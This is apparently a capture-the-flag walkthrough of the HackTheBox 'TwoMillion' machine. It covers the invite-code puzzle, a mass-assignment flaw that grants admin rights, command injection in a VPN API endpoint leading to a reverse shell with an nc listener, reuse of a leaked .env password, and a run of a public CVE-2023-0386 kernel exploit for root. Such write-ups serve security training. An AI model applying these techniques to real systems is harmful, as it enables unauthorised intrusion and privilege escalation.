TwoMillion is a special release from HackTheBox to celebrate 2,000,000 HackTheBox members. It released directly to retired, so no points and no bloods, just for run. It features a website that looks like the original HackTheBox platform, including the original invite code challenge that needed to be solved in order to register. Once registered, I’ll enumerate the API to find an endpoint that allows me to become an administrator, and then find a command injection in another admin endpoint. I’ll use database creds to pivot to the next user, and a kernel exploit to get to root. In Beyond Root, I’ll look at another easter egg challenge with a thank you message, and a YouTube video exploring the webserver and it’s vulnerabilities.

Box Info

Name TwoMillion TwoMillion
Play on HackTheBox
Release Date 7 Jun 2023
Retire Date 7 Jun 2023
OS Linux Linux
Base Points Easy [20]
First Blood User N/A (non-competitive)
First Blood Root N/A (non-competitive)
Creators TRX



nmap finds two open TCP ports, SSH (22) and HTTP (80):

oxdf@hacky$ nmap -p- --min-rate 10000
Starting Nmap 7.80 ( ) at 2023-06-01 16:59 EDT
Nmap scan report for 2million.htb (
Host is up (0.097s latency).
Not shown: 65533 closed ports
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 7.18 seconds
oxdf@hacky$ nmap -p 22,80 -sCV
Starting Nmap 7.80 ( ) at 2023-06-01 17:00 EDT
Nmap scan report for
Host is up (0.097s latency).

22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx
|_http-title: Did not follow redirect to http://2million.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 10.19 seconds

Based on the OpenSSH version, the host is likely running Ubuntu 22.04 jammy.

The webserver is redirecting to http://2million.htb.

Subdomain Bruteforce

Because there’s a DNS server names in use, I’ll bruteforce the server to see if anything different comes back with different subdomains of 2million.htb with ffuf:

oxdf@hacky$ ffuf -u -H "Host: FUZZ.2million.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -mc all -ac

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       


 :: Method           : GET
 :: URL              :
 :: Wordlist         : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.2million.htb
 :: Follow redirects : false
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: all

:: Progress: [4989/4989] :: Job [1/1] :: 408 req/sec :: Duration: [0:00:12] :: Errors: 0 ::

This run sends HTTP requests to the web server with various different subdomains in the Host header, and looks for any that aren’t the same. It doesn’t find any.

I’ll add this line to my /etc/hosts file: 2million.htb

Website - TCP 80


The site is a throwback to what HackTheBox looked like when it released in 2017:

It’s worth taking a look at the full page, as it has some fun easter eggs, including the original 32 machines, and the scoreboard from September 2017.

Most of the links lead to places on the page. The link to /login gives a login form:


I don’t have creds yet, so nothing here. The forgot password link doesn’t go anywhere.

The “Join” section has a link to /invite:


This page asks for an invite code, with a message that says “Feel free to hack your way in :)”:


This is the original HackTheBox invite challenge - more below.

Tech Stack

The HTTP headers don’t give much additional information:

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Jun 2023 21:13:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 64952

The 404 page is the custom throwback HTB 404 page:


I’m not able to guess any index page extensions.

Directory Brute Force

I’ll run feroxbuster against the site:

oxdf@hacky$ feroxbuster -u http://2million.htb

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.9.3
 🎯  Target Url            │ http://2million.htb
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.9.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │     
 🏁  Press [ENTER] to use the Scan Management Menu™
301      GET        7l       11w      162c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
302      GET        0l        0w        0c http://2million.htb/logout => http://2million.htb/
401      GET        0l        0w        0c http://2million.htb/api
405      GET        0l        0w        0c http://2million.htb/api/v1/user/register    
302      GET        0l        0w        0c http://2million.htb/home => http://2million.htb/
200      GET        1l        8w      637c http://2million.htb/js/inviteapi.min.js     
200      GET       94l      293w     4527c http://2million.htb/register
200      GET       80l      232w     3704c http://2million.htb/login
200      GET       46l      152w     1674c http://2million.htb/404
200      GET        5l     1881w   145660c http://2million.htb/js/htb-frontend.min.js
200      GET      260l      328w    29158c http://2million.htb/images/logo-transparent.png
200      GET       96l      285w     3859c http://2million.htb/invite
200      GET       13l     2458w   224695c http://2million.htb/css/htb-frontend.css      
200      GET       13l     2209w   199494c http://2million.htb/css/htb-frontpage.css    
405      GET        0l        0w        0c http://2million.htb/api/v1/user/login          
200      GET       27l      201w    15384c http://2million.htb/images/favicon.png         
200      GET      245l      317w    28522c http://2million.htb/images/logofull-tr-web.png  
200      GET        8l     3162w   254388c http://2million.htb/js/htb-frontpage.min.js 
200      GET     1242l     3326w    64952c http://2million.htb/ 

There’s a few interesting things in here before it starts just spewing out 500 errors and I kill it. /js/inviteapi.min.js is interesting (and will be important soon). There is a /register, which provides a registration form (it still requires an invite code):


There are a couple endpoints in /api/v1/user. I’ll note that feroxbuster finds these by looking at link targets, not be identifying /api. Therefore, it doesn’t brute force down this path. I may want to come back to that.

Shell as www-data

Invite Code Challenge


The Invite Code Challenge was a part of HackTheBox until April 2021. In order to register for an account, you had to hack yourself an invite code. This version is almost exactly the same (with some minor API endpoint changes) as it was back then.

Identify JavaScript

At the bottom of the page, there’s a <script> tag that includes /js/inviteapi.min.js:


The JavaScript is packed / minified, but at the bottom there’s two interesting strings:


Back on /invite (where this code is loaded), I’ll open the browser dev tools, and start typing “make” at the console:


It autocompletes that function as makeInviteCode. I’ll run it:


Decode Initial Data

The raw JSON of the response is:

    "0": 200,
    "success": 1,
    "data": {
        "data": "Va beqre gb trarengr gur vaivgr pbqr, znxr n CBFG erdhrfg gb \/ncv\/i1\/vaivgr\/trarengr",
        "enctype": "ROT13"
    "hint": "Data is encrypted ... We should probably check the encryption type in order to decrypt it..."

The hint says the data is encrypted, and the encytpe says it’s ROT13. is a nice ROT13 decoder:


Or I can do it from the command line with jq and tr:

oxdf@hacky$ curl -s -X POST http://2million.htb/api/v1/invite/how/to/generate | jq -r '' | tr 'a-zA-Z' 'n-za-mN-ZA-M'
In order to generate the invite code, make a POST request to /api/v1/invite/generate

Generate Code

To send a POST request to /api/v1/invite/generate, I’ll use curl. -X [method] is how to specify the request method:

oxdf@hacky$ curl -X POST http://2million.htb/api/v1/invite/generate

To view that nicely, I’ll add -s and pipe it into jq:

oxdf@hacky$ curl -X POST http://2million.htb/api/v1/invite/generate -s | jq .
  "0": 200,
  "success": 1,
  "data": {
    "code": "TUlQU1gtNDRFWkctVVNWVTgtMTk0VUs=",
    "format": "encoded"

Decode Code

The result this time says the format is “encoded”. Looking at the code, it is all numbers and letters and ends with =. That fits base64 encoding nicely. I’ll try decoding that:

oxdf@hacky$ echo "TUlQU1gtNDRFWkctVVNWVTgtMTk0VUs=" | base64 -d

That looks like an invite code. I can test it with the verifyInviteCode function in the dev tools console, and it reports it’s valid:


When I put that into the form on /invite, it redirects to /register with the code filled out:


I’m able to register here and login.

Authenticated Enumeration


With an account, I’ve got access to what looks like the original HackTheBox website:

It says that the site is performing database migrations, and some features are unavailable. In reality, that means most. The Dashboard, Rules, and Change Log links under “Main” work, and have nice throwback pages to the original HTB.

Under “Labs”, the only link that really works is the “Access” page, which leads to /home/access:

Clicking on “Connection Pack” and “Regengerate” both return a .ovpn file. It’s a valid OpenVPN connection config, and I can try to connect with it, but it doesn’t work.


“Connection Pack” sends a GET request to /api/v1/user/vpn/generate, and “Regenerate” sends a GET to /api/v1/user/vpn/regenerate.

I’ll send on of these requests to Burp Repeater and play with the API. /api returns a description:


/api/v1 returns details of the full API:

  "v1": { 
    "user": {
      "GET": {
        "/api/v1": "Route List",  
        "/api/v1/invite/how/to/generate": "Instructions on invite code generation", 
        "/api/v1/invite/generate": "Generate invite code",
        "/api/v1/invite/verify": "Verify invite code",
        "/api/v1/user/auth": "Check if user is authenticated",
        "/api/v1/user/vpn/generate": "Generate a new VPN configuration",
        "/api/v1/user/vpn/regenerate": "Regenerate VPN configuration",
        "/api/v1/user/vpn/download": "Download OVPN file"
      "POST": {
        "/api/v1/user/register": "Register a new user",
        "/api/v1/user/login": "Login with existing user"
    "admin": {
      "GET": {
        "/api/v1/admin/auth": "Check if user is admin"
      "POST": {
        "/api/v1/admin/vpn/generate": "Generate VPN for specific user"
      "PUT": {
        "/api/v1/admin/settings/update": "Update user settings"

Enumerate Admin API

Unsurprisingly, I am not an admin:


If I try to POST to /api/v1/admin/vpn/generate, it returns 401 Unauthorized:


However, a PUT request to /api/v1/admin/settings/update doesn’t return 401, but 200, with a different error in the body:


Get Admin Access

I’ll poke at this endpoint a bit more. As it says the content type is invalid, I’ll look at the Content-Type header in my request. There is none so I’ll add one. As the site seems to like JSON, I’ll set it to that:


Now it says email is missing. I’ll add that in the body in JSON:


Now it wants is_admin, so I’ll add that as true:


It’s looking for 0 or 1. I’ll set it to 1, and it seems to work:


If I try the verification again, it says true!


Command Injection

Enumerate generate API

As my account is now an admin, I don’t get a 401 response anymore from /api/v1/admin/vpn/generate:


I’ll add my username, and it generates a VPN key:


My account is now admin.


It’s probably not PHP code that generates a VPN key, but rather some Bash tools that generate the necessary information for a VPN key.

It’s worth checking if there is any command injection.

If the server is doing something like [username], then I’ll try putting a ; in the username to break that into a new command. I’ll also add a # at the end to comment out anything that might come after my input. It works:



To get a shell, I’ll start nc listening on my host, and put a bash reverse shell in as the username:


On sending this, I get a shell at my nc:

oxdf@hacky$ nc -lnvp 443
Listening on 443
Connection received on 38542
bash: cannot set terminal process group (1035): Inappropriate ioctl for device
bash: no job control in this shell

I’ll upgrade the shell using the script / stty trick:

www-data@2million:~/html$ script /dev/null -c bash
script /dev/null -c bash
Script started, output log file is '/dev/null'.
www-data@2million:~/html$ ^Z
[1]+  Stopped                 nc -lnvp 443
oxdf@hacky$ stty raw -echo; fg
nc -lnvp 443
reset: unknown terminal type unknown
Terminal type? screen

Shell as admin


The web root is in the default location, /var/www/html:

www-data@2million:~/html$ ls -la
total 56
drwxr-xr-x 10 root root 4096 Jun  2 22:30 .
drwxr-xr-x  3 root root 4096 May 26 20:34 ..
drwxr-xr-x  2 root root 4096 May 23 19:37 assets
drwxr-xr-x  2 root root 4096 Jun  2 16:30 controllers
drwxr-xr-x  5 root root 4096 May 29 12:21 css
-rw-r--r--  1 root root 1237 Jun  2 16:15 Database.php
-rw-r--r--  1 root root   87 Jun  2 18:56 .env
drwxr-xr-x  2 root root 4096 May 25 17:57 fonts
drwxr-xr-x  2 root root 4096 May 25 16:23 images
-rw-r--r--  1 root root 2692 Jun  2 18:57 index.php
drwxr-xr-x  3 root root 4096 Jun  1 20:15 js
-rw-r--r--  1 root root 2787 Jun  2 16:15 Router.php
drwxr-xr-x  2 root root 4096 Jun  2 16:15 views
drwxr-xr-x  5 root root 4096 Jun  2 22:30 VPN

index.php defines a bunch of routes for the various pages and endpoints used on the website.

There’s a .env file as well. This file is commonly used in PHP web frame works to set environment variables for use by the application. This application is more faking a .env file rather than actually using it in a framework, but the .env file still looks the same:


su / SSH

That password works for both su as admin:

www-data@2million:~/html$ su - admin
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.


And SSH:

oxdf@hacky$ sshpass -p SuperDuperPass123 ssh admin@2million.htb
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.15.70-051570-generic x86_64)
You have mail.

Either way, I can grab user.txt:

admin@2million:~$ cat user.txt

Shell as root



This exploit could actually be carried out as www-data. But if I do get to admin, there is a hint as to where to look.

When I logged in over SSH, there was a line in the banner that said admin had mail. That is held in /var/mail/admin:

From: ch4p <ch4p@2million.htb>
To: admin <admin@2million.htb>
Cc: g0blin <g0blin@2million.htb>
Subject: Urgent: Patch System OS
Date: Tue, 1 June 2023 10:45:22 -0700
Message-ID: <9876543210@2million.htb>
X-Mailer: ThunderMail Pro 5.2

Hey admin,

I'm know you're working as fast as you can to do the DB migration. While we're partially down, can you also upgrade the OS on our web host? There have been a few serious Linux kernel CVEs already this year. That one in OverlayFS / FUSE looks nasty. We can't get popped by that.

HTB Godfather

It talks about needing to patch the OS as well, and mentions a OverlayFS / FUSE CVE.

Identify Vulnerability

TwoMillion is running Ubuntu 22.04 with the kernel 5.15.70:

admin@2million:~$ uname -a
Linux 2million 5.15.70-051570-generic #202209231339 SMP Fri Sep 23 13:45:37 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
admin@2million:~$ cat /etc/lsb-release 

A search for “linux kernel vulnerability fuse overlayfs” limited to the last year returns a bunch of stuff about CVE-2023-0386:


It’s a bit hard to figure out exactly what versions are effected. This Ubuntu page shows that it’s fixed in 5.15.0-70.77:


It’s not clear how that compares to 5.15.70-051570-generic. That said, this was published on 22 March 2023, and the uname -a string shows a compile date of 23 September 2022.



This blog from Datadog does a really nice job going into the details of the exploit. The issue has to do with the overlay file system, and how files are moved between them. To exploit this, an attacker first creates a FUSE (File System in User Space) file system, and adds a binary that is owned by userid 0 in that file system and has the SetUID bit set. The error in OverlayFS allows for that file to be copied out of the FUSE FS into the main on maintaining it’s owner and SetUID.


There’s a POC for this exploit on GitHub from researcher xkaneiki. The is sparse, but gives enough instruction for use.

I’ll download the ZIP version of the repo:


I’ll upload it to 2million with scp:

oxdf@hacky$ sshpass -p SuperDuperPass123 scp admin@2million.htb:/tmp/

I’ll need two shells on 2million, which is easy to do with SSH. I’ll unzip the exploit, go into the folder, and run make all like it says in the

admin@2million:/tmp$ unzip 
   creating: CVE-2023-0386-main/
  inflating: CVE-2023-0386-main/Makefile  
  inflating: CVE-2023-0386-main/test/mnt.c  
admin@2million:/tmp$ cd CVE-2023-0386-main/
admin@2million:/tmp/CVE-2023-0386-main$ make all
gcc fuse.c -o fuse -D_FILE_OFFSET_BITS=64 -static -pthread -lfuse -ldl
fuse.c: In function ‘read_buf_callback’:
fuse.c:106:21: warning: format ‘%d’ expects argument of type ‘int’, but argument 2 has type ‘off_t’ {aka ‘long int’} [-Wformat=]
  106 |     printf("offset %d\n", off);
      |                    ~^     ~~~
/usr/bin/ld: /usr/lib/gcc/x86_64-linux-gnu/11/../../../x86_64-linux-gnu/libfuse.a(fuse.o): in function `fuse_new_common':
(.text+0xaf4e): warning: Using 'dlopen' in statically linked applications requires at runtime the shared libraries from the glibc version used for linking
gcc -o exp exp.c -lcap
gcc -o gc getshell.c

It throws some errors, but there are now three binaries that weren’t there before:

admin@2million:/tmp/CVE-2023-0386-main$ ls
exp  exp.c  fuse  fuse.c  gc  getshell.c  Makefile  ovlcap  test

In the first session, I’ll run the next command from the instructions:

admin@2million:/tmp/CVE-2023-0386-main$ ./fuse ./ovlcap/lower ./gc
[+] len of gc: 0x3ee0

It hangs.

In the other window, I’ll run the exploit:

admin@2million:/tmp/CVE-2023-0386-main$ ./exp 
uid:1000 gid:1000
[+] mount success
total 8
drwxrwxr-x 1 root   root     4096 Jun  2 23:11 .
drwxrwxr-x 6 root   root     4096 Jun  2 23:11 ..
-rwsrwxrwx 1 nobody nogroup 16096 Jan  1  1970 file
[+] exploit success!
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.


That’s a root shell!

I’ll grab root.txt:

root@2million:/root# cat root.txt



There’s one last challenge in /root, a file named thank_you.json:

root@2million:~# ls
root.txt  snap  thank_you.json
root@2million:~# cat thank_you.json 
{"encoding": "url", "data": "%7B%22encoding%22:%20%22hex%22,%20%22data%22:%20%227b22656e6372797074696f6e223a2022786f72222c2022656e6372707974696f6e5f6b6579223a20224861636b546865426f78222c2022656e636f64696e67223a2022626173653634222c202264617461223a20224441514347585167424345454c43414549515173534359744168553944776f664c5552765344676461414152446e51634454414746435145423073674230556a4152596e464130494d556745596749584a51514e487a7364466d494345535145454238374267426942685a6f4468595a6441494b4e7830574c526844487a73504144594848547050517a7739484131694268556c424130594d5567504c525a594b513848537a4d614244594744443046426b6430487742694442306b4241455a4e527741596873514c554543434477424144514b4653305046307337446b557743686b7243516f464d306858596749524a41304b424470494679634347546f4b41676b344455553348423036456b4a4c4141414d4d5538524a674952446a41424279344b574334454168393048776f334178786f44777766644141454e4170594b67514742585159436a456345536f4e426b736a41524571414130385151594b4e774246497745636141515644695952525330424857674f42557374427842735a58494f457777476442774e4a30384f4c524d61537a594e4169734246694550424564304941516842437767424345454c45674e497878594b6751474258514b45437344444767554577513653424571436c6771424138434d5135464e67635a50454549425473664353634c4879314245414d31476777734346526f416777484f416b484c52305a5041674d425868494243774c574341414451386e52516f73547830774551595a5051304c495170594b524d47537a49644379594f4653305046776f345342457454776774457841454f676b4a596734574c4545544754734f414445634553635041676430447863744741776754304d2f4f7738414e6763644f6b31444844464944534d5a48576748444267674452636e4331677044304d4f4f68344d4d4141574a51514e48335166445363644857674944515537486751324268636d515263444a6745544a7878594b5138485379634444433444433267414551353041416f734368786d5153594b4e7742464951635a4a41304742544d4e525345414654674e4268387844456c6943686b7243554d474e51734e4b7745646141494d425355644144414b48475242416755775341413043676f78515241415051514a59674d644b524d4e446a424944534d635743734f4452386d4151633347783073515263456442774e4a3038624a773050446a63634444514b57434550467734344241776c4368597242454d6650416b5259676b4e4c51305153794141444446504469454445516f36484555684142556c464130434942464c534755734a304547436a634152534d42484767454651346d45555576436855714242464c4f7735464e67636461436b434344383844536374467a424241415135425241734267777854554d6650416b4c4b5538424a785244445473615253414b4553594751777030474151774731676e42304d6650414557596759574b784d47447a304b435364504569635545515578455574694e68633945304d494f7759524d4159615052554b42446f6252536f4f4469314245414d314741416d5477776742454d644d526f6359676b5a4b684d4b4348514841324941445470424577633148414d744852566f414130506441454c4d5238524f67514853794562525459415743734f445238394268416a4178517851516f464f676354497873646141414e4433514e4579304444693150517a777853415177436c67684441344f4f6873414c685a594f424d4d486a424943695250447941414630736a4455557144673474515149494e7763494d674d524f776b47443351634369554b44434145455564304351736d547738745151594b4d7730584c685a594b513858416a634246534d62485767564377353043776f334151776b424241596441554d4c676f4c5041344e44696449484363625744774f51776737425142735a5849414242454f637874464e67425950416b47537a6f4e48545a504779414145783878476b6c694742417445775a4c497731464e5159554a45454142446f6344437761485767564445736b485259715477776742454d4a4f78304c4a67344b49515151537a734f525345574769305445413433485263724777466b51516f464a78674d4d41705950416b47537a6f4e48545a504879305042686b31484177744156676e42304d4f4941414d4951345561416b434344384e467a464457436b50423073334767416a4778316f41454d634f786f4a4a6b385049415152446e514443793059464330464241353041525a69446873724242415950516f4a4a30384d4a304543427a6847623067344554774a517738784452556e4841786f4268454b494145524e7773645a477470507a774e52516f4f47794d3143773457427831694f78307044413d3d227d%22%7D"}

It’s JSON with two keys, encoding which is set to “url” and data. I’ll grab the data and dump it in CyberChef with the “URL Decode” operation:


The result is another JSON blob, this time with "encoding set to “hex”. I’ll move the data to the input, disable the “URL Decode” and add “From Hex”:


Another blob. This time it has a keys for encryption, encryption_key, and encoding. The data looks like base64, so I’ll decode it, and then apply an XOR with the key “HackTheBox”:


It’s a thank you note.

Dear HackTheBox Community,

We are thrilled to announce a momentous milestone in our journey together. With immense joy and gratitude, we celebrate the achievement of reaching 2 million remarkable users! This incredible feat would not have been possible without each and every one of you.

From the very beginning, HackTheBox has been built upon the belief that knowledge sharing, collaboration, and hands-on experience are fundamental to personal and professional growth. Together, we have fostered an environment where innovation thrives and skills are honed. Each challenge completed, each machine conquered, and every skill learned has contributed to the collective intelligence that fuels this vibrant community.

To each and every member of the HackTheBox community, thank you for being a part of this incredible journey. Your contributions have shaped the very fabric of our platform and inspired us to continually innovate and evolve. We are immensely proud of what we have accomplished together, and we eagerly anticipate the countless milestones yet to come.

Here’s to the next chapter, where we will continue to push the boundaries of cybersecurity, inspire the next generation of ethical hackers, and create a world where knowledge is accessible to all.

With deepest gratitude,

The HackTheBox Team

Website Source Analysis

I made a quick video looking at the website source code. It’s a PHP application using routers defined in index.php. Both mistakes I exploited above were made in a very realistic way, which was fun to see.